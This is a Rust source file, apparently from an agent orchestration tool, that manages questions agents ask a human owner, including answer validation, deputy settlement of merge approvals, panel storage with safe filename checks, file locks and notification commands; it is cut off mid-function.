1use std::path::{Path, PathBuf};
33use std::time::Duration;
34
35use anyhow::{Context, Result, bail};
36use jiff::Timestamp;
37use serde::{Deserialize, Serialize};
38
39use crate::config;
40use crate::proc::Quiet as _;
41use crate::run::RunStatus;
42
43pub const SCHEMA: u32 = 5;
60
61const POLL: Duration = Duration::from_secs(3);
70
71const REPLY_QUIET_WINDOW: Duration = Duration::from_secs(5 * 60);
82
83const NOTIFY_TIMEOUT: Duration = Duration::from_secs(20);
89
90const WAIT_SLICE: Duration = Duration::from_secs(240);
114
115pub const LEASE_TTL: Duration = Duration::from_secs(90);
125
126const LOCK_STALE: Duration = Duration::from_secs(10);
129
130pub const WEB_URL_ENV: &str = "MAGI_WEB_URL";
141
142pub const PANEL_MAX_BYTES: u64 = 8 * 1024 * 1024;
151
152const PANEL_DIR: &str = ".panel";
158
159const PANEL_HTML: &str = "index.html";
161
162const PANEL_TMP: &str = ".panel.tmp";
164
165pub fn valid_asset_name(name: &str) -> bool {
182 if name.is_empty() || name.len() > 64 || name.contains("..") {
183 return false;
184 }
185 let mut chars = name.chars();
186 chars.next().is_some_and(|c| c.is_ascii_alphanumeric())
187 && chars.all(|c| c.is_ascii_alphanumeric() || matches!(c, '.' | '_' | '-'))
188}
189
190#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
192#[serde(rename_all = "lowercase")]
193pub enum QuestionStatus {
194 Open,
196 Answered,
198 Abandoned,
202}
203
204impl QuestionStatus {
205 pub fn open(self) -> bool {
207 matches!(self, Self::Open)
208 }
209
210 pub fn as_str(self) -> &'static str {
212 match self {
213 Self::Open => "open",
214 Self::Answered => "answered",
215 Self::Abandoned => "abandoned",
216 }
217 }
218}
219
220#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
227#[serde(rename_all = "lowercase")]
228pub enum Answer {
229 Choice(String),
231 Text(String),
233}
234
235#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
243#[serde(tag = "do", rename_all = "lowercase")]
244pub enum ChoiceAction {
245 Resume {
247 run: String,
249 },
250 Requeue,
252 Done,
254}
255
256impl ChoiceAction {
257 pub fn parse(spec: &str, default_run: &str) -> Result<(String, Self)> {
262 let Some((label, verb)) = spec.rsplit_once('=') else {
263 bail!("`--action {spec}` must look like `<choice>=<resume[:run]|requeue|done>`");
264 };
265 let label = label.trim();
266 if label.is_empty() {
267 bail!("`--action {spec}` names no choice before `=`");
268 }
269 let verb = verb.trim();
270 let action = match verb.split_once(':') {
271 Some(("resume", run)) if !run.trim().is_empty() => Self::Resume {
272 run: run.trim().to_owned(),
273 },
274 None if verb == "resume" => {
275 if default_run.is_empty() {
276 bail!("`--action {spec}` names no run and MAGI_RUN is not set");
277 }
278 Self::Resume {
279 run: default_run.to_owned(),
280 }
281 }
282 None if verb == "requeue" => Self::Requeue,
283 None if verb == "done" => Self::Done,
284 _ => bail!(
285 "unknown action `{verb}` in `--action {spec}`; \
286 use resume[:<run>], requeue or done"
287 ),
288 };
289 Ok((label.to_owned(), action))
290 }
291
292 pub fn describe(&self) -> String {
294 match self {
295 Self::Resume { run } => format!("resume run {}", short(run)),
296 Self::Requeue => "requeue the task".to_owned(),
297 Self::Done => "mark the task done".to_owned(),
298 }
299 }
300}
301
302pub fn parse_actions(
305 specs: &[String],
306 choices: &[String],
307 default_run: &str,
308) -> Result<std::collections::BTreeMap<String, ChoiceAction>> {
309 let mut out = std::collections::BTreeMap::new();
310 for spec in specs {
311 let (label, action) = ChoiceAction::parse(spec, default_run)?;
312 if !choices.contains(&label) {
313 bail!(
314 "`--action {spec}`: `{label}` is not one of the --choice values ({})",
315 choices.join(", ")
316 );
317 }
318 if out.insert(label.clone(), action).is_some() {
319 bail!("more than one --action for `{label}`");
320 }
321 }
322 Ok(out)
323}
324
325#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
336#[serde(rename_all = "lowercase")]
337pub enum Who {
338 Operator,
340 Agent,
343}
344
345#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
353#[serde(deny_unknown_fields)]
354pub struct Turn {
355 pub who: Who,
357 pub body: String,
359 pub at: Timestamp,
361}
362
363#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
365#[serde(rename_all = "lowercase")]
366pub enum WaiterKind {
367 Asker,
369 Daemon,
372 Deputy,
376}
377
378#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
390pub struct Deputy {
391 pub brief: String,
394 #[serde(default)]
396 pub agent: String,
397 #[serde(default)]
399 pub seat: Option<crate::agent::SeatState>,
400 #[serde(default)]
403 pub starts: u32,
404}
405
406impl Deputy {
407 pub fn new(brief: String) -> Self {
409 Self {
410 brief,
411 agent: String::new(),
412 seat: None,
413 starts: 0,
414 }
415 }
416}
417
418pub fn deputy_seat_key(id: &str) -> String {
420 format!("deputy-{}", short(id))
421}
422
423#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
428pub struct Waiter {
429 pub kind: WaiterKind,
431 pub since: Timestamp,
433}
434
435#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
444pub struct Lease {
445 pub kind: WaiterKind,
447 pub pid: u32,
449 pub beat_at: Timestamp,
451}
452
453impl Lease {
454 pub fn fresh(&self, now: Timestamp) -> bool {
456 now.as_second() - self.beat_at.as_second() <= LEASE_TTL.as_secs() as i64
457 }
458}
459
460#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
462#[serde(deny_unknown_fields)]
463pub struct Question {
464 pub schema: u32,
466 pub id: String,
469 pub run: String,
471 pub node: String,
473 pub seat: String,
476 pub summary: String,
479 pub detail: String,
482 pub choices: Vec<String>,
486 #[serde(default)]
490 pub actions: std::collections::BTreeMap<String, ChoiceAction>,
491 #[serde(default)]
498 pub panel: bool,
499 #[serde(default)]
506 pub assets: Vec<String>,
507 pub status: QuestionStatus,
509 pub asked_at: Timestamp,
511 pub answered_at: Option<Timestamp>,
513 pub answer: Option<Answer>,
515 #[serde(default)]
524 pub thread: Vec<Turn>,
525 #[serde(default)]
540 pub answer_timeout: u64,
541 #[serde(default)]
547 pub cwd: Option<String>,
548 #[serde(default)]
550 pub waiter: Option<Waiter>,
551 #[serde(default)]
555 pub delivered_turns: usize,
556 #[serde(default)]
559 pub answer_delivered: bool,
560 #[serde(default)]
563 pub deputy: Option<Deputy>,
564}
565
566impl Question {
567 pub fn new(
570 run: String,
571 node: String,
572 seat: String,
573 summary: String,
574 detail: String,
575 choices: Vec<String>,
576 ) -> Self {
577 Self {
578 schema: SCHEMA,
579 id: new_id(),
580 run,
581 node,
582 seat,
583 summary,
584 detail,
585 choices,
586 actions: std::collections::BTreeMap::new(),
587 panel: false,
588 assets: Vec::new(),
589 status: QuestionStatus::Open,
590 asked_at: Timestamp::now(),
591 answered_at: None,
592 answer: None,
593 thread: Vec::new(),
594 answer_timeout: 0,
595 cwd: None,
596 waiter: None,
597 delivered_turns: 0,
598 answer_delivered: false,
599 deputy: None,
600 }
601 }
602
603 pub fn short(&self) -> &str {
605 short(&self.id)
606 }
607
608 pub fn chosen_action(&self) -> Option<&ChoiceAction> {
611 match (&self.status, &self.answer) {
612 (QuestionStatus::Answered, Some(Answer::Choice(c))) => self.actions.get(c),
613 _ => None,
614 }
615 }
616
617 pub fn free_text(&self) -> bool {
619 self.choices.is_empty()
620 }
621
622 pub fn answer(&mut self, answer: Answer) -> Result<()> {
632 match self.status {
633 QuestionStatus::Answered => bail!(
634 "question {} was already answered; the run has moved on and a \
635 second answer would be a decision nobody acted on",
636 self.short()
637 ),
638 QuestionStatus::Abandoned => bail!(
639 "question {} was abandoned and the run behind it is gone",
640 self.short()
641 ),
642 QuestionStatus::Open => {}
643 }
644 let body = match &answer {
645 Answer::Choice(c) | Answer::Text(c) => c.as_str(),
646 };
647 if body.trim().is_empty() {
648 bail!(
649 "question {} needs an answer; an empty one tells the agent \
650 nothing and it would guess anyway",
651 self.short()
652 );
653 }
654 match &answer {
655 Answer::Choice(c) if self.free_text() => bail!(
656 "question {} asks for free text, so `{c}` cannot be a choice \
657 it offered",
658 self.short()
659 ),
660 Answer::Choice(c) if !self.choices.iter().any(|o| o == c) => bail!(
661 "`{c}` is not one of the choices question {} offers: {}",
662 self.short(),
663 self.choices.join(", ")
664 ),
665 Answer::Text(_) if !self.free_text() => bail!(
666 "question {} is multiple choice; answer with one of: {}",
667 self.short(),
668 self.choices.join(", ")
669 ),
670 _ => {}
671 }
672 self.answered_at = Some(Timestamp::now());
673 self.answer = Some(answer);
674 self.status = QuestionStatus::Answered;
675 Ok(())
676 }
677
678 pub fn abandon(&mut self, why: impl Into<String>) {
690 if !self.status.open() {
691 return;
692 }
693 self.status = QuestionStatus::Abandoned;
694 let why = why.into();
695 let why = why.trim();
696 if why.is_empty() {
697 return;
698 }
699 if !self.detail.is_empty() {
700 self.detail.push('\n');
701 }
702 self.detail.push_str("\n_Abandoned: ");
703 self.detail.push_str(why);
704 self.detail.push_str("._\n");
705 }
706
707 pub fn resolution(&self) -> Option<String> {
714 match (self.status, &self.answer) {
715 (QuestionStatus::Answered, Some(Answer::Choice(a) | Answer::Text(a))) => {
716 Some(a.clone())
717 }
718 _ => None,
719 }
720 }
721
722 pub fn settle_by_deputy(&mut self, seat: &str, label: &str, quote: &str) -> Result<()> {
733 let Some(deputy) = &self.deputy else {
734 bail!("question {} has no deputy", self.short());
735 };
736 let own = deputy.seat.as_ref().map(|s| s.key.as_str());
737 if own != Some(seat) {
738 bail!("only the deputy of question {} may settle it", self.short());
739 }
740 if !self.choices.iter().any(|c| c == label) {
741 bail!(
742 "`{label}` is not one of the choices offered on question {}",
743 self.short()
744 );
745 }
746 let quote = quote.trim();
747 if quote.is_empty()
748 || !self
749 .thread
750 .iter()
751 .any(|t| t.who == Who::Operator && t.body.contains(quote))
752 {
753 bail!(
754 "the quote is not something the owner said on question {}",
755 self.short()
756 );
757 }
758 if self.node == crate::land::APPROVAL_NODE {
759 let latest = self
766 .thread
767 .iter()
768 .rev()
769 .find(|t| t.who == Who::Operator)
770 .map(|t| t.body.trim());
771 let ok = if label == crate::land::APPROVE {
772 latest.is_some_and(|m| crate::land::merge_intent(m, quote))
773 } else if label == crate::land::HOLD {
774 latest.is_some_and(|m| {
775 quote.eq_ignore_ascii_case(label) && m.eq_ignore_ascii_case(label)
776 })
777 } else {
778 false
779 };
780 if !ok {
781 bail!(
782 "on a merge approval `{label}` settles it only when the owner's latest \
783 message clearly says so, unhedged and quoted verbatim ({}); ask what \
784 they mean with `--thread` instead",
785 if label == crate::land::HOLD {
786 "for `hold`, the whole message"
787 } else {
788 "no maybe / if / not / question"
789 }
790 );
791 }
792 }
793 self.thread.push(Turn {
794 who: Who::Agent,
795 body: format!("Settled as `{label}` on the owner's words: \"{quote}\""),
796 at: Timestamp::now(),
797 });
798 self.delivered_turns = self.thread.len();
799 self.answer(Answer::Choice(label.to_owned()))
800 }
801
802 pub fn say(&mut self, body: impl Into<String>) -> Result<()> {
813 match self.status {
814 QuestionStatus::Answered => bail!(
815 "question {} was already answered; there is nothing left to \
816 discuss",
817 self.short()
818 ),
819 QuestionStatus::Abandoned => bail!(
820 "question {} was abandoned and the run behind it is gone",
821 self.short()
822 ),
823 QuestionStatus::Open => {}
824 }
825 let body = body.into();
826 if body.trim().is_empty() {
827 bail!("a message to question {} cannot be empty", self.short());
828 }
829 self.thread.push(Turn {
830 who: Who::Operator,
831 body,
832 at: Timestamp::now(),
833 });
834 Ok(())
835 }
836
837 pub fn reply(&mut self, body: impl Into<String>, choices: Vec<String>) -> Result<()> {
847 match self.status {
848 QuestionStatus::Answered => bail!(
849 "question {} was already answered; replying now would not \
850 reach anyone",
851 self.short()
852 ),
853 QuestionStatus::Abandoned => bail!(
854 "question {} was abandoned and the run behind it is gone",
855 self.short()
856 ),
857 QuestionStatus::Open => {}
858 }
859 let body = body.into();
860 if body.trim().is_empty() {
861 bail!("a reply to question {} cannot be empty", self.short());
862 }
863 self.actions.retain(|label, _| choices.contains(label));
865 self.choices = choices;
866 let unread = self.unread_from_owner().is_some();
867 self.thread.push(Turn {
868 who: Who::Agent,
869 body,
870 at: Timestamp::now(),
871 });
872 if !unread {
876 self.delivered_turns = self.thread.len();
877 }
878 Ok(())
879 }
880
881 pub fn unread_from_owner(&self) -> Option<String> {
888 if !self.status.open() {
889 return None;
890 }
891 let said = self.undelivered_owner_turns();
892 (!said.is_empty()).then(|| said.join("\n\n"))
893 }
894
895 pub fn undelivered_owner_turns(&self) -> Vec<&str> {
901 let from = self.delivered_turns.min(self.thread.len());
902 self.thread[from..]
903 .iter()
904 .filter(|t| t.who == Who::Operator)
905 .map(|t| t.body.as_str())
906 .collect()
907 }
908
909 pub fn last_activity(&self) -> i64 {
913 self.thread
914 .iter()
915 .map(|t| t.at.as_second())
916 .max()
917 .unwrap_or(0)
918 .max(self.asked_at.as_second())
919 }
920
921 pub fn waiting_on_agent(&self) -> bool {
930 self.status.open() && matches!(self.thread.last(), Some(t) if t.who == Who::Operator)
931 }
932
933 fn should_notify(&self, now: Timestamp) -> bool {
941 let Some(last) = self
942 .thread
943 .iter()
944 .rev()
945 .find(|t| t.who == Who::Operator)
946 .map(|t| t.at)
947 else {
948 return true;
949 };
950 now.as_second() - last.as_second() > REPLY_QUIET_WINDOW.as_secs() as i64
951 }
952}
953
954#[derive(Debug, Clone)]
956pub struct Questions {
957 root: PathBuf,
958}
959
960impl Questions {
961 pub fn open() -> Self {
963 Self::at(crate::run::home().join("questions"))
964 }
965
966 pub fn at(root: PathBuf) -> Self {
969 Self { root }
970 }
971
972 pub fn root(&self) -> &Path {
974 &self.root
975 }
976
977 pub fn path_of(&self, id: &str) -> PathBuf {
979 self.root.join(format!("{id}.json"))
980 }
981
982 pub fn panel_dir(&self, id: &str) -> PathBuf {
984 self.root.join(format!("{id}{PANEL_DIR}"))
985 }
986
987 pub fn put_panel(&self, q: &mut Question, html: &str, assets: &[PathBuf]) -> Result<()> {
1011 if !valid_asset_name(&q.id) {
1012 bail!(
1013 "question id `{}` is not a name magi will build a panel path from",
1014 q.id
1015 );
1016 }
1017 if html.trim().is_empty() {
1018 bail!(
1019 "question {} was handed an empty panel; an empty frame reads to \
1020 the owner as \"the agent had nothing to say\", which is a lie",
1021 q.short()
1022 );
1023 }
1024
1025 let mut named: Vec<(String, &Path)> = Vec::with_capacity(assets.len());
1028 for src in assets {
1029 let name = src.file_name().and_then(|n| n.to_str()).unwrap_or_default();
1030 if !valid_asset_name(name) {
1031 bail!(
1032 "panel asset `{}` cannot be stored: a panel file name must \
1033 match ^[A-Za-z0-9][A-Za-z0-9._-]{{0,63}}$ and contain no `..`",
1034 src.display()
1035 );
1036 }
1037 if let Some((_, first)) = named.iter().find(|(n, _)| n == name) {
1038 bail!(
1039 "two panel assets are both named `{name}` - {} and {} - and \
1040 the panel can only show one of them; rename one at the source",
1041 first.display(),
1042 src.display()
1043 );
1044 }
1045 named.push((name.to_owned(), src.as_path()));
1046 }
1047
1048 let mut total = html.len() as u64;
1049 for (_, src) in &named {
1050 let meta = std::fs::metadata(src)
1051 .with_context(|| format!("stat panel asset {}", src.display()))?;
1052 if !meta.is_file() {
1053 bail!(
1054 "panel asset `{}` is not a file; a panel is html plus files \
1055 copied beside it",
1056 src.display()
1057 );
1058 }
1059 total = total.saturating_add(meta.len());
1060 }
1061 if total > PANEL_MAX_BYTES {
1062 bail!(
1063 "panel for question {} is {total} bytes, over magi's cap of \
1064 {PANEL_MAX_BYTES} bytes; nothing was written",
1065 q.short()
1066 );
1067 }
1068
1069 let tmp = self.root.join(format!("{}{PANEL_TMP}", q.id));
1070 let dir = self.panel_dir(&q.id);
1071 std::fs::create_dir_all(&self.root)
1072 .with_context(|| format!("create {}", self.root.display()))?;
1073 clear_dir(&tmp)?;
1074 std::fs::create_dir(&tmp).with_context(|| format!("create {}", tmp.display()))?;
1075 if let Err(e) = fill_panel(&tmp, html, &named) {
1076 let _ = std::fs::remove_dir_all(&tmp);
1079 return Err(e);
1080 }
1081 clear_dir(&dir)?;
1082 std::fs::rename(&tmp, &dir)
1083 .with_context(|| format!("move panel into {}", dir.display()))?;
1084
1085 q.panel = true;
1086 q.assets = named.into_iter().map(|(n, _)| n).collect();
1087 q.assets.sort_unstable();
1088 Ok(())
1089 }
1090
1091 pub fn panel_html(&self, id: &str) -> Option<String> {
1097 if !valid_asset_name(id) {
1098 return None;
1099 }
1100 std::fs::read_to_string(self.panel_dir(id).join(PANEL_HTML)).ok()
1101 }
1102
1103 pub fn panel_asset(&self, id: &str, name: &str) -> Result<Option<Vec<u8>>> {
1114 if !valid_asset_name(name) {
1115 bail!(
1116 "`{name}` is not a panel file name; it must match \
1117 ^[A-Za-z0-9][A-Za-z0-9._-]{{0,63}}$ and contain no `..`"
1118 );
1119 }
1120 if !valid_asset_name(id) {
1121 return Ok(None);
1122 }
1123 let dir = self.panel_dir(id);
1124 if !dir.is_dir() {
1125 return Ok(None);
1126 }
1127 let path = dir.join(name);
1128 match std::fs::read(&path) {
1129 Ok(bytes) => Ok(Some(bytes)),
1130 Err(e) if e.kind() == std::io::ErrorKind::NotFound => Ok(None),
1131 Err(e) => Err(e).with_context(|| format!("read {}", path.display())),
1132 }
1133 }
1134
1135 pub fn drop_panel(&self, id: &str) -> Result<()> {
1144 if !valid_asset_name(id) {
1145 bail!("question id `{id}` is not a name magi will build a panel path from");
1146 }
1147 clear_dir(&self.panel_dir(id))?;
1148 clear_dir(&self.root.join(format!("{id}{PANEL_TMP}")))
1149 }
1150
1151 pub fn lease_path(&self, id: &str) -> PathBuf {
1153 self.root.join(format!("{id}.lease"))
1154 }
1155
1156 pub fn read_lease(&self, id: &str) -> Option<Lease> {
1158 let body = std::fs::read_to_string(self.lease_path(id)).ok()?;
1159 serde_json::from_str(&body).ok()
1160 }
1161
1162 pub fn beat(&self, id: &str, kind: WaiterKind) {
1169 let lease = Lease {
1170 kind,
1171 pid: std::process::id(),
1172 beat_at: Timestamp::now(),
1173 };
1174 let path = self.lease_path(id);
1175 let tmp = path.with_extension("lease.tmp");
1176 let written = std::fs::create_dir_all(&self.root)
1177 .and_then(|()| std::fs::write(&tmp, serde_json::to_string(&lease).unwrap_or_default()))
1178 .and_then(|()| std::fs::rename(&tmp, &path));
1179 if let Err(e) = written {
1180 tracing::debug!("could not beat the lease on question {id}: {e}");
1181 }
1182 }
1183
1184 pub fn drop_lease(&self, id: &str) {
1186 let _ = std::fs::remove_file(self.lease_path(id));
1187 }
1188
1189 pub fn update<T>(
1200 &self,
1201 id: &str,
1202 f: impl FnOnce(&mut Question) -> Result<T>,
1203 ) -> Result<(Question, T)> {
1204 std::fs::create_dir_all(&self.root)
1205 .with_context(|| format!("create {}", self.root.display()))?;
1206 let lock = self.root.join(format!("{id}.lock"));
1207 let started = std::time::Instant::now();
1208 loop {
1209 match std::fs::OpenOptions::new()
1210 .write(true)
1211 .create_new(true)
1212 .open(&lock)
1213 {
1214 Ok(_) => break,
1215 Err(e) if e.kind() == std::io::ErrorKind::AlreadyExists => {
1216 let stale = std::fs::metadata(&lock)
1217 .and_then(|m| m.modified())
1218 .ok()
1219 .and_then(|t| t.elapsed().ok())
1220 .is_some_and(|age| age > LOCK_STALE);
1221 if stale {
1222 let _ = std::fs::remove_file(&lock);
1223 } else if started.elapsed() > LOCK_STALE {
1224 bail!("could not lock question {id}");
1225 } else {
1226 std::thread::sleep(Duration::from_millis(15));
1227 }
1228 }
1229 Err(e) => return Err(e).with_context(|| format!("lock {}", lock.display())),
1230 }
1231 }
1232 struct Unlock(PathBuf);
1233 impl Drop for Unlock {
1234 fn drop(&mut self) {
1235 let _ = std::fs::remove_file(&self.0);
1236 }
1237 }
1238 let _guard = Unlock(lock);
1239 let mut q = read_path(&self.path_of(id))?;
1240 let out = f(&mut q)?;
1241 self.put(&mut q)?;
1242 Ok((q, out))
1243 }
1244
1245 pub fn put(&self, q: &mut Question) -> Result<()> {
1249 std::fs::create_dir_all(&self.root)
1250 .with_context(|| format!("create {}", self.root.display()))?;
1251 let body = serde_json::to_string_pretty(q).context("serialize question")?;
1252 let path = self.path_of(&q.id);
1253 let tmp = path.with_extension("json.tmp");
1254 let is_new = !path.exists();
1255 std::fs::write(&tmp, &body).with_context(|| format!("write {}", tmp.display()))?;
1256 std::fs::rename(&tmp, &path).with_context(|| format!("replace {}", path.display()))?;
1257 if is_new
1260 && q.status.open()
1261 && q.node != crate::bump::NOTICE_NODE
1262 && let Some(home) = self.root.parent().filter(|p| !p.as_os_str().is_empty())
1263 {
1264 crate::notices::quiet_for(home, q);
1265 }
1266 Ok(())
1267 }
1268
1269 pub fn get(&self, id: &str) -> Result<Question> {
1271 let resolved = self.resolve_id(id)?;
1272 read_path(&self.path_of(&resolved))
1273 }
1274
1275 pub fn list(&self) -> Vec<Question> {
1283 let mut all: Vec<Question> = std::fs::read_dir(&self.root)
1284 .into_iter()
1285 .flatten()
1286 .flatten()
1287 .map(|e| e.path())
1288 .filter(|p| p.extension().is_some_and(|x| x == "json"))
1289 .filter_map(|p| read_path(&p).ok())
1290 .collect();
1291 all.sort_unstable_by(|a, b| {
1292 let rank = |q: &Question| u8::from(!q.status.open());
1293 rank(a).cmp(&rank(b)).then_with(|| b.id.cmp(&a.id))
1294 });
1295 all
1296 }
1297
1298 pub fn open_for(&self, run: &str) -> Vec<Question> {
1304 self.list()
1305 .into_iter()
1306 .filter(|q| q.status.open() && q.run == run)
1307 .collect()
1308 }
1309
1310 pub fn abandon_for_run(&self, run: &str, why: &str) -> Result<usize> {
1323 let mut abandoned = 0;
1324 for mut q in self.open_for(run) {
1325 q.abandon(why);
1326 self.put(&mut q)?;
1327 abandoned += 1;
1328 }
1329 Ok(abandoned)
1330 }
1331
1332 pub fn settle_run(&self, run: &str, status: RunStatus) -> Result<usize> {
1356 if status.resumable() {
1357 return Ok(0);
1358 }
1359 let why = format!(
1360 "run {run} {}, so nothing is waiting for this answer",
1361 status.as_str()
1362 );
1363 let mut abandoned = 0;
1368 for mut q in self.open_for(run) {
1369 if q.node == crate::bump::NOTICE_NODE {
1370 continue;
1371 }
1372 q.abandon(&why);
1373 self.put(&mut q)?;
1374 abandoned += 1;
1375 }
1376 Ok(abandoned)
1377 }
1378
1379 pub fn resolve_id(&self, prefix: &str) -> Result<String> {
1382 if self.path_of(prefix).is_file() {
1383 return Ok(prefix.to_owned());
1384 }
1385 let hits: Vec<String> = self
1386 .list()
1387 .into_iter()
1388 .map(|q| q.id)
1389 .filter(|id| id.starts_with(prefix) || id.ends_with(prefix))
1390 .collect();
1391 match hits.len() {
1392 1 => Ok(hits.into_iter().next().expect("exactly one hit")),
1393 0 => bail!("no question matches `{prefix}`"),
1394 _ => bail!(
1395 "`{prefix}` matches {} questions: {}",
1396 hits.len(),
1397 hits.join(", ")
1398 ),
1399 }
1400 }
1401
1402 pub fn revision(&self) -> u64 {
1406 std::fs::read_dir(&self.root)
1407 .into_iter()
1408 .flatten()
1409 .flatten()
1410 .filter_map(|e| e.metadata().ok())
1411 .filter_map(|m| m.modified().ok())
1412 .filter_map(|t| t.duration_since(std::time::UNIX_EPOCH).ok())
1413 .map(|d| d.as_millis() as u64)
1414 .max()
1415 .unwrap_or(0)
1416 }
1417
1418 pub fn count_open(&self) -> usize {
1424 self.list().iter().filter(|q| q.status.open()).count()
1425 }
1426
1427 pub fn count_needs_owner(&self) -> usize {
1436 self.list()
1437 .iter()
1438 .filter(|q| q.status.open() && !q.waiting_on_agent())
1439 .count()
1440 }
1441}
1442
1443#[derive(Debug, Clone, PartialEq, Eq)]
1445pub enum Wait {
1446 Answered(String),
1448 Replied(String),
1453 Pending,
1460 Abandoned,
1465}
1466
1467pub async fn ask_and_wait(
1474 q: &mut Question,
1475 store: &Questions,
1476 notify: &config::Notify,
1477 timeout: Duration,
1478) -> Result<Wait> {
1479 wait_for_owner(q, store, notify, timeout, POLL).await
1480}
1481
1482pub async fn resume_wait(q: &mut Question, store: &Questions, timeout: Duration) -> Result<Wait> {
1497 wait_loop(q, store, timeout, WAIT_SLICE, POLL).await
1498}
1499
1500async fn wait_for_owner(
1506 q: &mut Question,
1507 store: &Questions,
1508 cfg: &config::Notify,
1509 timeout: Duration,
1510 poll: Duration,
1511) -> Result<Wait> {
1512 if !store.path_of(&q.id).is_file() {
1516 store.put(q).context("file the question")?;
1517 }
1518 if q.should_notify(Timestamp::now()) {
1519 if let Err(e) = notify(cfg, q).await {
1520 tracing::warn!(
1525 "could not notify about question {}: {e:#} - the web UI is the \
1526 only surface for it now",
1527 q.short()
1528 );
1529 }
1530 }
1531 tracing::info!(
1532 "question {} from {} is waiting for you: {}",
1533 q.short(),
1534 q.seat,
1535 q.summary
1536 );
1537 wait_loop(q, store, timeout, WAIT_SLICE, poll).await
1538}
1539
1540fn hold(store: &Questions, id: &str) {
1542 store.beat(id, WaiterKind::Asker);
1543 let took = store.update(id, |q| {
1544 if q.status.open() {
1545 q.waiter = Some(Waiter {
1546 kind: WaiterKind::Asker,
1547 since: Timestamp::now(),
1548 });
1549 }
1550 Ok(())
1551 });
1552 if let Err(e) = took {
1553 tracing::debug!("could not note the wait on question {id}: {e:#}");
1554 }
1555}
1556
1557pub fn hand_over(store: &Questions, q: &mut Question) {
1565 let done = store.update(&q.id, |r| {
1566 r.delivered_turns = r.delivered_turns.max(q.thread.len());
1567 if r.status == QuestionStatus::Answered {
1568 r.answer_delivered = true;
1569 }
1570 r.waiter = None;
1571 Ok(())
1572 });
1573 match done {
1574 Ok((fresh, ())) => *q = fresh,
1575 Err(e) => tracing::debug!("could not record the hand-over of {}: {e:#}", q.short()),
1576 }
1577}
1578
1579pub fn answer_for_agent(q: &Question, answer: &str) -> String {
1583 let says = q.undelivered_owner_turns();
1584 if says.is_empty() {
1585 return answer.to_owned();
1586 }
1587 format!(
1588 "the owner also said, before answering:\n\n{}\n\nthe owner answered:\n\n{answer}",
1589 says.join("\n\n")
1590 )
1591}
1592
1593pub fn deliver_answer(
1596 store: &Questions,
1597 q: &mut Question,
1598 answer: &str,
1599 out: &mut impl std::io::Write,
1600) -> std::io::Result<()> {
1601 writeln!(out, "{}", answer_for_agent(q, answer))?;
1602 out.flush()?;
1603 hand_over(store, q);
1604 Ok(())
1605}
1606
1607async fn wait_loop(
1617 q: &mut Question,
1618 store: &Questions,
1619 timeout: Duration,
1620 slice: Duration,
1621 poll: Duration,
1622) -> Result<Wait> {
1623 if let Some(said) = q.unread_from_owner() {
1633 return Ok(Wait::Replied(said));
1634 }
1635 hold(store, &q.id);
1636
1637 let bounded = timeout.min(slice);
1638 let is_the_real_deadline = bounded >= timeout;
1639 let deadline = tokio::time::Instant::now() + bounded;
1640 loop {
1641 let now = tokio::time::Instant::now();
1642 if now >= deadline {
1643 if !is_the_real_deadline {
1644 return Ok(Wait::Pending);
1648 }
1649 let why = format!("no answer within {}s of asking", timeout.as_secs().max(1));
1650 let (fresh, unread) = store
1654 .update(&q.id, |r| {
1655 let unread = r.unread_from_owner();
1656 if unread.is_none() {
1657 r.abandon(&why);
1658 r.waiter = None;
1659 }
1660 Ok(unread)
1661 })
1662 .context("record the abandoned question")?;
1663 *q = fresh;
1664 if let Some(said) = unread {
1665 return Ok(Wait::Replied(said));
1666 }
1667 tracing::warn!(
1668 "question {} went unanswered for {}s; the run parks and the \
1669 question stays as the record of it",
1670 q.short(),
1671 timeout.as_secs()
1672 );
1673 return Ok(Wait::Abandoned);
1674 }
1675 tokio::time::sleep(poll.min(deadline - now)).await;
1676 store.beat(&q.id, WaiterKind::Asker);
1677 match store.get(&q.id) {
1678 Ok(fresh) if !fresh.status.open() => {
1679 *q = fresh;
1683 return Ok(match q.resolution() {
1684 Some(a) => Wait::Answered(a),
1685 None => Wait::Abandoned,
1688 });
1689 }
1690 Ok(fresh) => {
1691 if let Some(said) = fresh.unread_from_owner() {
1692 *q = fresh;
1693 return Ok(Wait::Replied(said));
1694 }
1695 }
1698 Err(e) => {
1699 tracing::debug!("could not re-read question {}: {e:#}", q.short());
1703 }
1704 }
1705 }
1706}
1707
1708pub async fn notify(cmd: &config::Notify, q: &Question) -> Result<()> {
1719 notify_text(cmd, &q.run, &q.summary).await
1720}
1721
1722pub async fn notify_text(cmd: &config::Notify, run: &str, summary: &str) -> Result<()> {
1725 let Some((program, args)) = cmd.command.split_first() else {
1726 return Ok(());
1728 };
1729 let url = web_url();
1730 if url.is_empty() && cmd.command.iter().any(|a| a.contains("{url}")) {
1731 tracing::warn!(
1732 "the notification command uses {{url}} but {WEB_URL_ENV} is unset, \
1733 so the link will be empty - export it next to `magi serve` with \
1734 the address `magi web --open` printed"
1735 );
1736 }
1737 let argv: Vec<String> = args.iter().map(|a| expand(a, run, summary, &url)).collect();
1738 tracing::debug!(program = %program, args = ?argv, "notifying");
1739
1740 let mut child = tokio::process::Command::new(program);
1741 child.quiet();
1742 child
1743 .args(&argv)
1744 .stdin(std::process::Stdio::null())
1745 .kill_on_drop(true);
1748 let out = match tokio::time::timeout(NOTIFY_TIMEOUT, child.output()).await {
1749 Ok(r) => r.with_context(|| format!("run notification command `{program}`"))?,
1750 Err(_) => bail!(
1751 "notification command `{program}` did not finish within {}s",
1752 NOTIFY_TIMEOUT.as_secs()
1753 ),
1754 };
1755 if !out.status.success() {
1756 let stderr = String::from_utf8_lossy(&out.stderr);
1757 let why = stderr
1758 .lines()
1759 .rev()
1760 .find(|l| !l.trim().is_empty())
1761 .unwrap_or("no output on stderr")
1762 .trim();
1763 bail!(
1764 "notification command `{program}` exited with {}: {why}",
1765 out.status
1766 );
1767 }
1768 Ok(())
1769}
1770
1771fn expand(template: &str, run: &str, summary: &str, url: &str) -> String {
